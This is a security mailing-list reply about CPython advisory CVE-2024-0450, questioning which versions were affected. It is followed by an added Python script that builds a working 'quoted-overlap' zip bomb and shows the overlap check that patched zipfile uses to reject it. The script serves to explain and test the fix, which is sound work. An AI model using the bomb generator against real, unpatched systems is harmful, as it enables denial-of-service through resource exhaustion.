Re: [Security-announce][CVE-2024-0450] Quoted zip-bomb protection for zipfile
6 Apr 2024, 1:01 p.m.
Hello, I am a bit confused about this.

On Tue, 2024-03-19 at 11:10 -0400, Ee Durbin wrote:

> An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.

It seems that 3.11.8 and 3.12.2 already contained a patch for this:

$ git describe --contains a956e510f6336d5ae111ba429a61c3ade30a7549
v3.11.8~173
$ git describe --contains fa181fcf2156f703347b03a3b1966ce47be8ab3b
v3.12.2~196

> The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython make the zipfile module reject zip archives which overlap entries in the archive.
-- Best regards, Michał Górny
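Added example (not code from the advisory, from CPython, or from this thread): a small script that builds a "quoted-overlap" archive in the style the advisory refers to (each member's DEFLATE stream opens with a non-final stored block whose payload is the next member's local file header, so every member's declared compressed data runs through all later headers into one shared kernel), and then applies the same bounds check that the fixed zipfile performs: sorted by local-header offset, a member's compressed data must end no later than the next local header or the central directory. Member names, the all-zero payload and the minimal central-directory reader are constructed here for illustration and assume no ZIP64 and no archive comment. `read_with_zipfile` reports "ok" for every member on an unpatched interpreter and "rejected: Overlapped entries ..." for all but the last member on a release carrying the fix.

```python
"""Quoted-overlap zip bomb and the overlap check that defeats it (added example)."""
import io
import struct
import zipfile
import zlib

LFH_SIG, CDH_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
DOS_DATE = (2024 - 1980) << 9 | 1 << 5 | 1          # 2024-01-01; any valid date works


def local_header(name, crc, csize, usize):
    # version needed, flags, method 8 = deflate, time, date, crc, sizes, name len, extra len
    return struct.pack("<IHHHHHIIIHH", LFH_SIG, 20, 0, 8, 0, DOS_DATE,
                       crc, csize, usize, len(name), 0) + name


def central_header(name, crc, csize, usize, offset):
    return struct.pack("<IHHHHHHIIIHHHHHII", CDH_SIG, 20, 20, 0, 8, 0, DOS_DATE,
                       crc, csize, usize, len(name), 0, 0, 0, 0, 0, offset) + name


def build_quoted_overlap_zip(payload, count):
    """Member i's stream = stored block quoting LFH_{i+1}, then member i+1's stream,
    ... down to one shared DEFLATE kernel. Constructed test data, not a real sample."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)     # raw deflate, ends with BFINAL=1
    kernel = co.compress(payload) + co.flush()
    names = [f"f{i:03d}.bin".encode() for i in range(count)]
    headers, meta = [b""] * count, [None] * count
    crc, csize, usize, out = zlib.crc32(payload), len(kernel), len(payload), payload
    for i in range(count - 1, -1, -1):               # sizes depend on the member after it
        headers[i] = local_header(names[i], crc, csize, usize)
        meta[i] = (crc, csize, usize)
        if i:
            out = headers[i] + out                   # what member i-1 inflates to
            crc, csize, usize = zlib.crc32(out), 5 + len(headers[i]) + csize, len(out)
    body, offsets = bytearray(), []
    for i in range(count):
        if i:   # stored-block prefix (BFINAL=0, BTYPE=00, LEN, NLEN); the real header follows
            body += b"\x00" + struct.pack("<HH", len(headers[i]), len(headers[i]) ^ 0xFFFF)
        offsets.append(len(body))
        body += headers[i]
    body += kernel
    cd = b"".join(central_header(n, *m, o) for n, m, o in zip(names, meta, offsets))
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, count, count, len(cd), len(body), 0)
    return bytes(body) + cd + eocd


def parse_central_directory(data):
    """Minimal central-directory reader; assumes no ZIP64 and no archive comment."""
    eocd = data.rfind(struct.pack("<I", EOCD_SIG))
    count, _cd_size, cd_off = struct.unpack_from("<HII", data, eocd + 10)
    members, pos = [], cd_off
    for _ in range(count):
        crc, csize, usize, nlen, xlen, clen = struct.unpack_from("<IIIHHH", data, pos + 16)
        offset = struct.unpack_from("<I", data, pos + 42)[0]
        name = data[pos + 46:pos + 46 + nlen].decode()
        members.append({"name": name, "offset": offset, "crc": crc, "csize": csize, "usize": usize})
        pos += 46 + nlen + xlen + clen
    return members, cd_off


def data_start(data, member):
    nlen, xlen = struct.unpack_from("<HH", data, member["offset"] + 26)
    return member["offset"] + 30 + nlen + xlen


def find_overlapping_entries(data):
    """The check the fix adds: a member's compressed data must end at or before
    the next local header (or the central directory) begins."""
    members, cd_off = parse_central_directory(data)
    members.sort(key=lambda m: m["offset"])
    bad = []
    for i, m in enumerate(members):
        limit = members[i + 1]["offset"] if i + 1 < len(members) else cd_off
        if data_start(data, m) + m["csize"] > limit:
            bad.append(m["name"])
    return bad


def inflate_member(data, name):
    """Inflate one member with plain zlib, ignoring overlap, as an unpatched reader does."""
    m = next(m for m in parse_central_directory(data)[0] if m["name"] == name)
    start = data_start(data, m)
    out = zlib.decompress(data[start:start + m["csize"]], -15)
    if zlib.crc32(out) != m["crc"] or len(out) != m["usize"]:
        raise ValueError(f"CRC or size mismatch for {name}")
    return out


def nominal_ratio(data):
    return sum(m["usize"] for m in parse_central_directory(data)[0]) / len(data)


def read_with_zipfile(data):
    """Per-member outcome through the stdlib: 'ok' or 'rejected: <BadZipFile message>'."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            try:
                with zf.open(info) as f:
                    while f.read(1 << 16):
                        pass
                results[info.filename] = "ok"
            except zipfile.BadZipFile as e:
                results[info.filename] = f"rejected: {e}"
    return results


if __name__ == "__main__":
    bomb = build_quoted_overlap_zip(b"\x00" * (1 << 20), 16)
    print(f"{len(bomb)} bytes on disk, nominal ratio {nominal_ratio(bomb):.0f}:1")
    print("overlapping:", find_overlapping_entries(bomb))
    print(read_with_zipfile(bomb))
```

The last member is the only one whose data ends exactly at the central directory, so it is the only one that passes the check on a fixed interpreter; every earlier member's declared compressed size reaches past the next local header, which is precisely the condition the patched zipfile refuses before it inflates a single byte.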